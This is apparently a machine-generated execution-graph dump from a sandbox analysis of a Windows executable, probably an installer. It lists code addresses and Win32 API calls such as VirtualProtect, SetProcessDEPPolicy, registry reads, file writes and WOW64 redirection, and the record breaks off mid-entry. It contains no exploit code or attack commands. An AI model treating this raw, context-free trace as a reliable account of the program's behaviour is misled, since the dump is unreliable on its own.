                                                                                                      execution_graph 4979 409c40 5020 4030dc 4979->5020 4981 409c56 5023 4042e8 4981->5023 4983 409c5b 5026 40457c GetModuleHandleA GetProcAddress 4983->5026 4989 409c6a 5043 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4989->5043 5006 409d43 5105 4074a0 5006->5105 5008 409d05 5008->5006 5138 409aa0 5008->5138 5009 409d84 5109 407a28 5009->5109 5010 409d69 5010->5009 5011 409aa0 4 API calls 5010->5011 5011->5009 5013 409da9 5119 408b08 5013->5119 5017 409def 5018 408b08 21 API calls 5017->5018 5019 409e28 5017->5019 5018->5017 5148 403094 5020->5148 5022 4030e1 GetModuleHandleA GetCommandLineA 5022->4981 5025 404323 5023->5025 5149 403154 5023->5149 5025->4983 5027 404598 5026->5027 5028 40459f GetProcAddress 5026->5028 5027->5028 5029 4045b5 GetProcAddress 5028->5029 5030 4045ae 5028->5030 5031 4045c4 SetProcessDEPPolicy 5029->5031 5032 4045c8 5029->5032 5030->5029 5031->5032 5033 4065b8 5032->5033 5162 405c98 5033->5162 5042 406604 6F541CD0 5042->4989 5044 4090f7 5043->5044 5289 406fa0 SetErrorMode 5044->5289 5049 403198 4 API calls 5050 40913c 5049->5050 5051 409b30 GetSystemInfo VirtualQuery 5050->5051 5052 409be4 5051->5052 5053 409b5a 5051->5053 5057 409768 5052->5057 5053->5052 5054 409bc5 VirtualQuery 5053->5054 5055 409b84 VirtualProtect 5053->5055 5056 409bb3 VirtualProtect 5053->5056 5054->5052 5054->5053 5055->5053 5056->5054 5299 406bd0 GetCommandLineA 5057->5299 5059 409825 5061 4031b8 4 API calls 5059->5061 5060 406c2c 6 API calls 5063 409785 5060->5063 5062 40983f 5061->5062 5065 406c2c 5062->5065 5063->5059 5063->5060 5064 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5063->5064 5064->5063 5066 406c53 GetModuleFileNameA 5065->5066 5067 406c77 GetCommandLineA 5065->5067 5068 403278 4 API calls 5066->5068 5069 406c7c 5067->5069 5070 406c75 5068->5070 5071 406c81 5069->5071 5072 406af0 4 API calls 5069->5072 5075 406c89 5069->5075 5073 406ca4 5070->5073 5074 403198 4 API calls 5071->5074 5072->5069 5076 403198 4 API calls 5073->5076 5074->5075 5077 40322c 4 API calls 5075->5077 5078 406cb9 5076->5078 5077->5073 5079 4031e8 5078->5079 5080 4031ec 5079->5080 5083 4031fc 5079->5083 5082 403254 4 API calls 5080->5082 5080->5083 5081 403228 5085 4074e0 5081->5085 5082->5083 5083->5081 5084 4025ac 4 API calls 5083->5084 5084->5081 5086 4074ea 5085->5086 5320 407576 5086->5320 5323 407578 5086->5323 5087 407516 5088 40752a 5087->5088 5326 40748c GetLastError 5087->5326 5092 409bec FindResourceA 5088->5092 5093 409c01 5092->5093 5094 409c06 SizeofResource 5092->5094 5097 409aa0 4 API calls 5093->5097 5095 409c13 5094->5095 5096 409c18 LoadResource 5094->5096 5098 409aa0 4 API calls 5095->5098 5099 409c26 5096->5099 5100 409c2b LockResource 5096->5100 5097->5094 5098->5096 5101 409aa0 4 API calls 5099->5101 5102 409c37 5100->5102 5103 409c3c 5100->5103 5101->5100 5104 409aa0 4 API calls 5102->5104 5103->5008 5135 407918 5103->5135 5104->5103 5106 4074b4 5105->5106 5107 4074c4 5106->5107 5108 4073ec 20 API calls 5106->5108 5107->5010 5108->5107 5110 407a35 5109->5110 5111 405880 4 API calls 5110->5111 5112 407a89 5110->5112 5111->5112 5113 407918 InterlockedExchange 5112->5113 5114 407a9b 5113->5114 5115 405880 4 API calls 5114->5115 5116 407ab1 5114->5116 5115->5116 5117 405880 4 API calls 5116->5117 5118 407af4 5116->5118 5117->5118 5118->5013 5128 408b82 5119->5128 5134 408b39 5119->5134 5120 408bcd 5434 407cb8 5120->5434 5121 407cb8 21 API calls 5121->5134 5122 407cb8 21 API calls 5122->5128 5125 408be4 5127 4031b8 4 API calls 5125->5127 5126 4034f0 4 API calls 5126->5128 5129 408bfe 5127->5129 5128->5120 5128->5122 5128->5126 5132 403420 4 API calls 5128->5132 5133 4031e8 4 API calls 5128->5133 5145 404c10 5129->5145 5130 403420 4 API calls 5130->5134 5131 4031e8 4 API calls 5131->5134 5132->5128 5133->5128 5134->5121 5134->5128 5134->5130 5134->5131 5425 4034f0 5134->5425 5460 4078c4 5135->5460 5139 409ac1 5138->5139 5140 409aa9 5138->5140 5142 405880 4 API calls 5139->5142 5141 405880 4 API calls 5140->5141 5144 409abb 5141->5144 5143 409ad2 5142->5143 5143->5006 5144->5006 5146 402594 4 API calls 5145->5146 5147 404c1b 5146->5147 5147->5017 5148->5022 5150 403164 5149->5150 5151 40318c TlsGetValue 5149->5151 5150->5025 5152 403196 5151->5152 5153 40316f 5151->5153 5152->5025 5157 40310c 5153->5157 5155 403174 TlsGetValue 5156 403184 5155->5156 5156->5025 5158 403120 LocalAlloc 5157->5158 5159 403116 5157->5159 5160 40313e TlsSetValue 5158->5160 5161 403132 5158->5161 5159->5158 5160->5161 5161->5155 5234 405930 5162->5234 5165 405270 GetSystemDefaultLCID 5167 4052a6 5165->5167 5166 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5166->5167 5167->5166 5168 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5167->5168 5169 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5167->5169 5171 405308 5167->5171 5168->5167 5169->5167 5170 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5170->5171 5171->5170 5172 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5171->5172 5173 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5173 5174 40538b 5171->5174 5172->5171 5173->5171 5267 4031b8 5174->5267 5177 4053b4 GetSystemDefaultLCID 5271 4051fc GetLocaleInfoA 5177->5271 5180 4031e8 4 API calls 5181 4053f4 5180->5181 5182 4051fc 5 API calls 5181->5182 5183 405409 5182->5183 5184 4051fc 5 API calls 5183->5184 5185 40542d 5184->5185 5277 405248 GetLocaleInfoA 5185->5277 5188 405248 GetLocaleInfoA 5189 40545d 5188->5189 5190 4051fc 5 API calls 5189->5190 5191 405477 5190->5191 5192 405248 GetLocaleInfoA 5191->5192 5193 405494 5192->5193 5194 4051fc 5 API calls 5193->5194 5195 4054ae 5194->5195 5196 4031e8 4 API calls 5195->5196 5197 4054bb 5196->5197 5198 4051fc 5 API calls 5197->5198 5199 4054d0 5198->5199 5200 4031e8 4 API calls 5199->5200 5201 4054dd 5200->5201 5202 405248 GetLocaleInfoA 5201->5202 5203 4054eb 5202->5203 5204 4051fc 5 API calls 5203->5204 5205 405505 5204->5205 5206 4031e8 4 API calls 5205->5206 5207 405512 5206->5207 5208 4051fc 5 API calls 5207->5208 5209 405527 5208->5209 5210 4031e8 4 API calls 5209->5210 5211 405534 5210->5211 5212 4051fc 5 API calls 5211->5212 5213 405549 5212->5213 5214 405566 5213->5214 5215 405557 5213->5215 5217 40322c 4 API calls 5214->5217 5285 40322c 5215->5285 5218 405564 5217->5218 5219 4051fc 5 API calls 5218->5219 5220 405588 5219->5220 5221 4055a5 5220->5221 5222 405596 5220->5222 5224 403198 4 API calls 5221->5224 5223 40322c 4 API calls 5222->5223 5225 4055a3 5223->5225 5224->5225 5279 4033b4 5225->5279 5227 4055c7 5228 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5227->5228 5229 4055e1 5228->5229 5230 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5229->5230 5231 4055fb 5230->5231 5232 405ce4 GetVersionExA 5231->5232 5233 405cfb 5232->5233 5233->5042 5235 40593c 5234->5235 5242 404ccc LoadStringA 5235->5242 5238 4031e8 4 API calls 5239 40596d 5238->5239 5245 403198 5239->5245 5249 403278 5242->5249 5246 4031b7 5245->5246 5247 40319e 5245->5247 5246->5165 5247->5246 5263 4025ac 5247->5263 5254 403254 5249->5254 5251 403288 5252 403198 4 API calls 5251->5252 5253 4032a0 5252->5253 5253->5238 5255 403274 5254->5255 5256 403258 5254->5256 5255->5251 5259 402594 5256->5259 5258 403261 5258->5251 5260 402598 5259->5260 5261 4025a2 5259->5261 5260->5261 5262 403154 4 API calls 5260->5262 5261->5258 5261->5261 5262->5261 5264 4025b0 5263->5264 5266 4025ba 5263->5266 5265 403154 4 API calls 5264->5265 5264->5266 5265->5266 5266->5246 5269 4031be 5267->5269 5268 4031e3 5268->5177 5269->5268 5270 4025ac 4 API calls 5269->5270 5270->5269 5272 405223 5271->5272 5273 405235 5271->5273 5274 403278 4 API calls 5272->5274 5275 40322c 4 API calls 5273->5275 5276 405233 5274->5276 5275->5276 5276->5180 5278 405264 5277->5278 5278->5188 5280 4033bc 5279->5280 5281 403254 4 API calls 5280->5281 5282 4033cf 5281->5282 5283 4031e8 4 API calls 5282->5283 5284 4033f7 5283->5284 5287 403230 5285->5287 5286 403252 5286->5218 5287->5286 5288 4025ac 4 API calls 5287->5288 5288->5286 5297 403414 5289->5297 5292 406fee 5293 407284 FormatMessageA 5292->5293 5294 4072aa 5293->5294 5295 403278 4 API calls 5294->5295 5296 4072c7 5295->5296 5296->5049 5298 403418 LoadLibraryA 5297->5298 5298->5292 5306 406af0 5299->5306 5301 406bf3 5302 406c05 5301->5302 5303 406af0 4 API calls 5301->5303 5304 403198 4 API calls 5302->5304 5303->5301 5305 406c1a 5304->5305 5305->5063 5307 406b1c 5306->5307 5308 403278 4 API calls 5307->5308 5309 406b29 5308->5309 5316 403420 5309->5316 5311 406b31 5312 4031e8 4 API calls 5311->5312 5313 406b49 5312->5313 5314 403198 4 API calls 5313->5314 5315 406b6b 5314->5315 5315->5301 5317 403426 5316->5317 5319 403437 5316->5319 5318 403254 4 API calls 5317->5318 5317->5319 5318->5319 5319->5311 5321 407578 5320->5321 5322 4075b7 CreateFileA 5321->5322 5322->5087 5324 403414 5323->5324 5325 4075b7 CreateFileA 5324->5325 5325->5087 5329 4073ec 5326->5329 5330 407284 5 API calls 5329->5330 5332 407414 5330->5332 5331 407434 5341 405880 5331->5341 5332->5331 5338 405184 5332->5338 5335 407443 5336 403198 4 API calls 5335->5336 5337 407460 5336->5337 5337->5088 5345 405198 5338->5345 5342 405887 5341->5342 5343 4031e8 4 API calls 5342->5343 5344 40589f 5343->5344 5344->5335 5346 4051b5 5345->5346 5353 404e48 5346->5353 5349 4051e1 5350 403278 4 API calls 5349->5350 5352 405193 5350->5352 5352->5331 5356 404e63 5353->5356 5354 404e75 5354->5349 5358 404bd4 5354->5358 5356->5354 5361 404f6a 5356->5361 5368 404e3c 5356->5368 5359 405930 5 API calls 5358->5359 5360 404be5 5359->5360 5360->5349 5362 404f7b 5361->5362 5366 404fc9 5361->5366 5364 40504f 5362->5364 5362->5366 5367 404fe7 5364->5367 5375 404e28 5364->5375 5366->5367 5371 404de4 5366->5371 5367->5356 5369 403198 4 API calls 5368->5369 5370 404e46 5369->5370 5370->5356 5372 404df2 5371->5372 5378 404bec 5372->5378 5374 404e20 5374->5366 5391 4039a4 5375->5391 5381 4059a0 5378->5381 5380 404c05 5380->5374 5382 4059ae 5381->5382 5383 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5382->5383 5384 4059d8 5383->5384 5385 405184 19 API calls 5384->5385 5386 4059e6 5385->5386 5387 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5386->5387 5388 4059f1 5387->5388 5389 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5388->5389 5390 405a0b 5389->5390 5390->5380 5392 4039ab 5391->5392 5397 4038b4 5392->5397 5394 4039cb 5395 403198 4 API calls 5394->5395 5396 4039d2 5395->5396 5396->5367 5398 4038d5 5397->5398 5399 4038c8 5397->5399 5401 403934 5398->5401 5402 4038db 5398->5402 5400 403780 6 API calls 5399->5400 5405 4038d0 5400->5405 5403 403993 5401->5403 5404 40393b 5401->5404 5406 4038e1 5402->5406 5407 4038ee 5402->5407 5408 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5403->5408 5409 403941 5404->5409 5410 40394b 5404->5410 5405->5394 5411 403894 6 API calls 5406->5411 5412 403894 6 API calls 5407->5412 5408->5405 5413 403864 9 API calls 5409->5413 5414 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5410->5414 5411->5405 5415 4038fc 5412->5415 5413->5405 5416 40395d 5414->5416 5417 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5415->5417 5419 403864 9 API calls 5416->5419 5418 403917 5417->5418 5421 40374c VariantClear 5418->5421 5420 403976 5419->5420 5423 40374c VariantClear 5420->5423 5422 40392c 5421->5422 5422->5394 5424 40398b 5423->5424 5424->5394 5426 4034fd 5425->5426 5432 40352d 5425->5432 5428 403526 5426->5428 5430 403509 5426->5430 5427 403198 4 API calls 5433 403517 5427->5433 5429 403254 4 API calls 5428->5429 5429->5432 5440 4025c4 5430->5440 5432->5427 5433->5134 5435 407cd3 5434->5435 5439 407cc8 5434->5439 5444 407c5c 5435->5444 5438 405880 4 API calls 5438->5439 5439->5125 5441 4025ca 5440->5441 5442 4025dc 5441->5442 5443 403154 4 API calls 5441->5443 5442->5433 5442->5442 5443->5442 5445 407c70 5444->5445 5446 407caf 5444->5446 5445->5446 5448 407bac 5445->5448 5446->5438 5446->5439 5449 407bb7 5448->5449 5452 407bc8 5448->5452 5450 405880 4 API calls 5449->5450 5450->5452 5451 4074a0 20 API calls 5453 407bdc 5451->5453 5452->5451 5454 4074a0 20 API calls 5453->5454 5455 407bfd 5454->5455 5456 407918 InterlockedExchange 5455->5456 5457 407c12 5456->5457 5458 407c28 5457->5458 5459 405880 4 API calls 5457->5459 5458->5445 5459->5458 5461 4078d6 5460->5461 5462 4078e7 5460->5462 5463 4078db InterlockedExchange 5461->5463 5462->5008 5463->5462 6236 409e47 6237 409e6c 6236->6237 6238 4098f4 15 API calls 6237->6238 6242 409e71 6238->6242 6239 409ec4 6270 4026c4 GetSystemTime 6239->6270 6241 409ec9 6243 409330 32 API calls 6241->6243 6242->6239 6244 408dd8 4 API calls 6242->6244 6245 409ed1 6243->6245 6246 409ea0 6244->6246 6247 4031e8 4 API calls 6245->6247 6249 409ea8 MessageBoxA 6246->6249 6248 409ede 6247->6248 6250 406928 5 API calls 6248->6250 6249->6239 6251 409eb5 6249->6251 6252 409eeb 6250->6252 6253 405854 5 API calls 6251->6253 6254 4066c0 5 API calls 6252->6254 6253->6239 6255 409efb 6254->6255 6256 406638 5 API calls 6255->6256 6257 409f0c 6256->6257 6258 403340 4 API calls 6257->6258 6259 409f1a 6258->6259 6260 4031e8 4 API calls 6259->6260 6261 409f2a 6260->6261 6262 4074e0 23 API calls 6261->6262 6263 409f69 6262->6263 6264 402594 4 API calls 6263->6264 6265 409f89 6264->6265 6266 407a28 5 API calls 6265->6266 6267 409fcb 6266->6267 6268 407cb8 21 API calls 6267->6268 6269 409ff2 6268->6269 6270->6241 6197 407548 6198 407554 CloseHandle 6197->6198 6199 40755d 6197->6199 6198->6199 6649 402b48 RaiseException 6200 407749 6201 4076dc WriteFile 6200->6201 6210 407724 6200->6210 6202 4076e8 6201->6202 6203 4076ef 6201->6203 6204 40748c 21 API calls 6202->6204 6205 407700 6203->6205 6206 4073ec 20 API calls 6203->6206 6204->6203 6206->6205 6207 4077e0 6208 4078db InterlockedExchange 6207->6208 6209 407890 6207->6209 6211 4078e7 6208->6211 6210->6200 6210->6207 6650 40294a 6651 402952 6650->6651 6652 402967 6651->6652 6653 403554 4 API calls 6651->6653 6653->6651 6654 403f4a 6655 403f53 6654->6655 6656 403f5c 6654->6656 6658 403f07 6655->6658 6661 403f09 6658->6661 6659 403f3c 6659->6656 6663 403154 4 API calls 6661->6663 6665 403e9c 6661->6665 6669 403f3d 6661->6669 6681 403e9c 6661->6681 6662 403ecf 6662->6656 6663->6661 6664 403ef2 6666 402674 4 API calls 6664->6666 6665->6659 6665->6664 6670 403ea9 6665->6670 6672 403e8e 6665->6672 6666->6662 6669->6656 6670->6662 6671 402674 4 API calls 6670->6671 6671->6662 6673 403e4c 6672->6673 6674 403e67 6673->6674 6675 403e62 6673->6675 6676 403e7b 6673->6676 6679 403e78 6674->6679 6680 402674 4 API calls 6674->6680 6677 403cc8 4 API calls 6675->6677 6678 402674 4 API calls 6676->6678 6677->6674 6678->6679 6679->6664 6679->6670 6680->6679 6682 403ed7 6681->6682 6688 403ea9 6681->6688 6684 403ef2 6682->6684 6686 403e8e 4 API calls 6682->6686 6683 403ecf 6683->6661 6685 402674 4 API calls 6684->6685 6685->6683 6687 403ee6 6686->6687 6687->6684 6687->6688 6688->6683 6689 402674 4 API calls 6688->6689 6689->6683 6698 405150 6699 405163 6698->6699 6700 404e48 19 API calls 6699->6700 6701 405177 6700->6701 6271 403a52 6272 403a74 6271->6272 6273 403a5a WriteFile 6271->6273 6273->6272 6274 403a78 GetLastError 6273->6274 6274->6272 6275 402654 6276 403154 4 API calls 6275->6276 6277 402614 6276->6277 6278 402632 6277->6278 6279 403154 4 API calls 6277->6279 6278->6278 6279->6278 5646 409e62 5647 409aa0 4 API calls 5646->5647 5648 409e67 5647->5648 5649 409e6c 5648->5649 5749 402f24 5648->5749 5683 4098f4 5649->5683 5652 409ec4 5688 4026c4 GetSystemTime 5652->5688 5654 409e71 5654->5652 5754 408dd8 5654->5754 5655 409ec9 5689 409330 5655->5689 5659 409ea0 5662 409ea8 MessageBoxA 5659->5662 5660 4031e8 4 API calls 5661 409ede 5660->5661 5707 406928 5661->5707 5662->5652 5664 409eb5 5662->5664 5757 405854 5664->5757 5670 409f0c 5734 403340 5670->5734 5672 409f1a 5673 4031e8 4 API calls 5672->5673 5674 409f2a 5673->5674 5675 4074e0 23 API calls 5674->5675 5676 409f69 5675->5676 5677 402594 4 API calls 5676->5677 5678 409f89 5677->5678 5679 407a28 5 API calls 5678->5679 5680 409fcb 5679->5680 5681 407cb8 21 API calls 5680->5681 5682 409ff2 5681->5682 5761 40953c 5683->5761 5688->5655 5698 409350 5689->5698 5692 409375 CreateDirectoryA 5693 4093ed 5692->5693 5694 40937f GetLastError 5692->5694 5695 40322c 4 API calls 5693->5695 5694->5698 5696 4093f7 5695->5696 5699 4031b8 4 API calls 5696->5699 5697 408dd8 4 API calls 5697->5698 5698->5692 5698->5697 5703 407284 5 API calls 5698->5703 5706 405880 4 API calls 5698->5706 5853 406cf4 5698->5853 5876 409224 5698->5876 5895 404c84 5698->5895 5898 408da8 5698->5898 5701 409411 5699->5701 5702 4031b8 4 API calls 5701->5702 5704 40941e 5702->5704 5703->5698 5704->5660 5706->5698 6008 406820 5707->6008 5710 403454 4 API calls 5711 40694a 5710->5711 5712 4066c0 5711->5712 6013 4068e4 5712->6013 5715 4066f0 5718 403340 4 API calls 5715->5718 5716 4066fe 5717 403454 4 API calls 5716->5717 5720 406711 5717->5720 5719 4066fc 5718->5719 5722 403198 4 API calls 5719->5722 5721 403340 4 API calls 5720->5721 5721->5719 5723 406733 5722->5723 5724 406638 5723->5724 5725 406642 5724->5725 5726 406665 5724->5726 6019 406950 5725->6019 5728 40322c 4 API calls 5726->5728 5730 40666e 5728->5730 5729 406649 5729->5726 5731 406654 5729->5731 5730->5670 5732 403340 4 API calls 5731->5732 5733 406662 5732->5733 5733->5670 5735 403344 5734->5735 5736 4033a5 5734->5736 5737 4031e8 5735->5737 5738 40334c 5735->5738 5739 4031fc 5737->5739 5742 403254 4 API calls 5737->5742 5738->5736 5740 40335b 5738->5740 5743 4031e8 4 API calls 5738->5743 5741 403228 5739->5741 5745 4025ac 4 API calls 5739->5745 5744 403254 4 API calls 5740->5744 5741->5672 5742->5739 5743->5740 5746 403375 5744->5746 5745->5741 5747 4031e8 4 API calls 5746->5747 5748 4033a1 5747->5748 5748->5672 5750 403154 4 API calls 5749->5750 5751 402f29 5750->5751 6025 402bcc 5751->6025 5753 402f51 5753->5753 5755 408da8 4 API calls 5754->5755 5756 408df4 5755->5756 5756->5659 5758 405859 5757->5758 5759 405930 5 API calls 5758->5759 5760 40586b 5759->5760 5760->5760 5768 40955b 5761->5768 5762 409590 5765 40959d GetUserDefaultLangID 5762->5765 5769 409592 5762->5769 5763 409594 5779 407024 GetModuleHandleA GetProcAddress 5763->5779 5765->5769 5767 40956f 5773 409884 5767->5773 5768->5762 5768->5763 5768->5767 5769->5767 5770 4095cb GetACP 5769->5770 5771 4095ef 5769->5771 5770->5767 5770->5769 5771->5767 5772 409615 GetACP 5771->5772 5772->5767 5772->5771 5774 40988c 5773->5774 5778 4098c6 5773->5778 5775 403420 4 API calls 5774->5775 5774->5778 5776 4098c0 5775->5776 5837 408e80 5776->5837 5778->5654 5780 407067 5779->5780 5781 40705e 5779->5781 5782 407070 5780->5782 5783 4070a8 5780->5783 5792 403198 4 API calls 5781->5792 5800 406f68 5782->5800 5785 406f68 RegOpenKeyExA 5783->5785 5787 4070c1 5785->5787 5786 407089 5788 4070de 5786->5788 5803 406f5c 5786->5803 5787->5788 5789 406f5c 6 API calls 5787->5789 5790 40322c 4 API calls 5788->5790 5793 4070d5 RegCloseKey 5789->5793 5794 4070eb 5790->5794 5796 407120 5792->5796 5793->5788 5806 4032fc 5794->5806 5798 403198 4 API calls 5796->5798 5799 407128 5798->5799 5799->5769 5801 406f73 5800->5801 5802 406f79 RegOpenKeyExA 5800->5802 5801->5802 5802->5786 5820 406e10 5803->5820 5807 403300 5806->5807 5808 40333f 5806->5808 5809 4031e8 5807->5809 5810 40330a 5807->5810 5808->5781 5813 4031fc 5809->5813 5817 403254 4 API calls 5809->5817 5811 403334 5810->5811 5812 40331d 5810->5812 5816 4034f0 4 API calls 5811->5816 5814 4034f0 4 API calls 5812->5814 5815 403228 5813->5815 5819 4025ac 4 API calls 5813->5819 5818 403322 5814->5818 5815->5781 5816->5818 5817->5813 5818->5781 5819->5815 5821 406e36 RegQueryValueExA 5820->5821 5826 406e7b 5821->5826 5828 406e59 5821->5828 5822 406e73 5824 403198 4 API calls 5822->5824 5823 403198 4 API calls 5825 406f47 RegCloseKey 5823->5825 5824->5826 5825->5788 5826->5823 5827 403278 4 API calls 5827->5828 5828->5822 5828->5826 5828->5827 5829 403420 4 API calls 5828->5829 5830 406eb0 RegQueryValueExA 5829->5830 5830->5821 5831 406ecc 5830->5831 5831->5826 5832 4034f0 4 API calls 5831->5832 5833 406f0e 5832->5833 5834 406f20 5833->5834 5836 403420 4 API calls 5833->5836 5835 4031e8 4 API calls 5834->5835 5835->5826 5836->5834 5838 408e8e 5837->5838 5840 408ea6 5838->5840 5850 408e18 5838->5850 5841 408e18 4 API calls 5840->5841 5842 408eca 5840->5842 5841->5842 5843 407918 InterlockedExchange 5842->5843 5844 408ee5 5843->5844 5845 408e18 4 API calls 5844->5845 5847 408ef8 5844->5847 5845->5847 5846 408e18 4 API calls 5846->5847 5847->5846 5848 403278 4 API calls 5847->5848 5849 408f27 5847->5849 5848->5847 5849->5778 5851 405880 4 API calls 5850->5851 5852 408e29 5851->5852 5852->5840 5902 406a58 5853->5902 5856 406d26 5858 406a58 5 API calls 5856->5858 5860 406d72 5856->5860 5859 406d36 5858->5859 5861 406d42 5859->5861 5863 406a34 7 API calls 5859->5863 5910 406888 5860->5910 5861->5860 5866 406a58 5 API calls 5861->5866 5872 406d67 5861->5872 5863->5861 5868 406d5b 5866->5868 5867 406638 5 API calls 5869 406d87 5867->5869 5870 406a34 7 API calls 5868->5870 5868->5872 5871 40322c 4 API calls 5869->5871 5870->5872 5873 406d91 5871->5873 5872->5860 5922 406cc8 GetWindowsDirectoryA 5872->5922 5874 4031b8 4 API calls 5873->5874 5875 406dab 5874->5875 5875->5698 5877 409244 5876->5877 5878 406638 5 API calls 5877->5878 5879 40925d 5878->5879 5880 40322c 4 API calls 5879->5880 5887 409268 5880->5887 5882 406978 6 API calls 5882->5887 5883 4033b4 4 API calls 5883->5887 5884 408dd8 4 API calls 5884->5887 5885 405880 4 API calls 5885->5887 5887->5882 5887->5883 5887->5884 5887->5885 5888 4092e4 5887->5888 5962 4091b0 5887->5962 5970 409034 5887->5970 5889 40322c 4 API calls 5888->5889 5890 4092ef 5889->5890 5891 4031b8 4 API calls 5890->5891 5892 409309 5891->5892 5893 403198 4 API calls 5892->5893 5894 409311 5893->5894 5894->5698 5896 405198 19 API calls 5895->5896 5897 404ca2 5896->5897 5897->5698 5899 408dc8 5898->5899 5998 408c80 5899->5998 5903 4034f0 4 API calls 5902->5903 5904 406a6b 5903->5904 5905 406a82 GetEnvironmentVariableA 5904->5905 5909 406a95 5904->5909 5924 406dec 5904->5924 5905->5904 5906 406a8e 5905->5906 5907 403198 4 API calls 5906->5907 5907->5909 5909->5856 5919 406a34 5909->5919 5911 403414 5910->5911 5912 4068ab GetFullPathNameA 5911->5912 5913 4068b7 5912->5913 5914 4068ce 5912->5914 5913->5914 5915 4068bf 5913->5915 5916 40322c 4 API calls 5914->5916 5917 403278 4 API calls 5915->5917 5918 4068cc 5916->5918 5917->5918 5918->5867 5928 4069dc 5919->5928 5923 406ce9 5922->5923 5923->5860 5925 406dfa 5924->5925 5926 4034f0 4 API calls 5925->5926 5927 406e08 5926->5927 5927->5904 5935 406978 5928->5935 5930 4069fe 5931 406a06 GetFileAttributesA 5930->5931 5932 406a1b 5931->5932 5933 403198 4 API calls 5932->5933 5934 406a23 5933->5934 5934->5856 5945 406744 5935->5945 5937 4069b0 5940 4069c6 5937->5940 5941 4069bb 5937->5941 5939 406989 5939->5937 5952 406970 CharPrevA 5939->5952 5953 403454 5940->5953 5942 40322c 4 API calls 5941->5942 5944 4069c4 5942->5944 5944->5930 5948 406755 5945->5948 5946 4067b9 5947 406680 IsDBCSLeadByte 5946->5947 5949 4067b4 5946->5949 5947->5949 5948->5946 5950 406773 5948->5950 5949->5939 5950->5949 5960 406680 IsDBCSLeadByte 5950->5960 5952->5939 5954 403486 5953->5954 5955 403459 5953->5955 5956 403198 4 API calls 5954->5956 5955->5954 5958 40346d 5955->5958 5957 40347c 5956->5957 5957->5944 5959 403278 4 API calls 5958->5959 5959->5957 5961 406694 5960->5961 5961->5950 5963 403198 4 API calls 5962->5963 5966 4091d1 5963->5966 5967 4091fe 5966->5967 5979 4032a8 5966->5979 5982 403494 5966->5982 5968 403198 4 API calls 5967->5968 5969 409213 5968->5969 5969->5887 5986 408f70 5970->5986 5972 40904a 5973 40904e 5972->5973 5992 406a48 5972->5992 5973->5887 5976 409081 5995 408fac 5976->5995 5980 403278 4 API calls 5979->5980 5981 4032b5 5980->5981 5981->5966 5983 403498 5982->5983 5985 4034c3 5982->5985 5984 4034f0 4 API calls 5983->5984 5984->5985 5985->5966 5987 408f7a 5986->5987 5988 408f7e 5986->5988 5987->5972 5989 408fa0 SetLastError 5988->5989 5990 408f87 Wow64DisableWow64FsRedirection 5988->5990 5991 408f9b 5989->5991 5990->5991 5991->5972 5993 4069dc 7 API calls 5992->5993 5994 406a52 GetLastError 5993->5994 5994->5976 5996 408fb1 Wow64RevertWow64FsRedirection 5995->5996 5997 408fbb 5995->5997 5996->5997 5997->5887 5999 403198 4 API calls 5998->5999 6005 408cb1 5998->6005 5999->6005 6000 408cdc 6001 4031b8 4 API calls 6000->6001 6003 408d69 6001->6003 6002 408cc8 6006 4032fc 4 API calls 6002->6006 6003->5698 6004 403278 4 API calls 6004->6005 6005->6000 6005->6002 6005->6004 6007 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6005->6007 6006->6000 6007->6005 6009 406744 IsDBCSLeadByte 6008->6009 6011 406835 6009->6011 6010 40687f 6010->5710 6011->6010 6012 406680 IsDBCSLeadByte 6011->6012 6012->6011 6014 4068f3 6013->6014 6015 406820 IsDBCSLeadByte 6014->6015 6017 4068fe 6015->6017 6016 4066ea 6016->5715 6016->5716 6017->6016 6018 406680 IsDBCSLeadByte 6017->6018 6018->6017 6020 406957 6019->6020 6021 40695b 6019->6021 6020->5729 6024 406970 CharPrevA 6021->6024 6023 40696c 6023->5729 6024->6023 6026 402bd5 RaiseException 6025->6026 6027 402be6 6025->6027 6026->6027 6027->5753 6280 402e64 6281 402e69 6280->6281 6282 402e7a RtlUnwind 6281->6282 6283 402e5e 6281->6283 6284 402e9d 6282->6284 6301 40667c IsDBCSLeadByte 6302 406694 6301->6302 6714 403f7d 6715 403fa2 6714->6715 6718 403f84 6714->6718 6717 403e8e 4 API calls 6715->6717 6715->6718 6716 403f8c 6717->6718 6718->6716 6719 402674 4 API calls 6718->6719 6720 403fca 6719->6720 6727 403d02 6734 403d12 6727->6734 6728 403ddf ExitProcess 6729 403db8 6731 403cc8 4 API calls 6729->6731 6730 403dea 6732 403dc2 6731->6732 6733 403cc8 4 API calls 6732->6733 6735 403dcc 6733->6735 6734->6728 6734->6729 6734->6730 6734->6734 6737 403da4 6734->6737 6738 403d8f MessageBoxA 6734->6738 6747 4019dc 6735->6747 6743 403fe4 6737->6743 6738->6729 6740 403dd1 6740->6728 6740->6730 6744 403fe8 6743->6744 6745 403f07 4 API calls 6744->6745 6746 404006 6745->6746 6748 401abb 6747->6748 6749 4019ed 6747->6749 6748->6740 6750 401a04 RtlEnterCriticalSection 6749->6750 6751 401a0e LocalFree 6749->6751 6750->6751 6752 401a41 6751->6752 6753 401a2f VirtualFree 6752->6753 6754 401a49 6752->6754 6753->6752 6755 401a70 LocalFree 6754->6755 6756 401a87 6754->6756 6755->6755 6755->6756 6757 401aa9 RtlDeleteCriticalSection 6756->6757 6758 401a9f RtlLeaveCriticalSection 6756->6758 6757->6740 6758->6757 6311 404206 6312 4041cc 6311->6312 6315 40420a 6311->6315 6313 404282 6314 403154 4 API calls 6316 